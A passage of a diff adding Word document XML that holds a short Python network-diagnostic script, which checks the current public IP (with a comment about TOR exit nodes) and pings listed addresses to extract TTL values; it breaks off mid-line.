+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>import re</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>import requests</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">def </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>check_ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    # Send a request to confirm the IP address is from a TOR exit node</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    req = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>requests.get</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>("http://icanhazip.com")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    return </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>req.text</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">def </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>check_ping</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ping_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    f = open(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ping_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>, "r")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    lines = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>f.readlines</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>traceroute_value</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = []</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>trace_ttl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = []</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    print("Current IP: {}".format(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>check_ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>()))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    for line in lines:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ip_addr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>line.strip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ping_proc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>subprocess.Popen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(['ping', '-c', '1', '{}'.format(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ip_addr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)], </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>stdout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>subprocess.PIPE</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ping_stdout</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ping_stderr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ping_proc.communicate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        if </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ping_proc.returncode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> == 0:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            output = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ping_stdout.decode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ttl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>re.search</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>('</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ttl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>=?\d+', output).group(0)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ttl_value</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>re.search</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
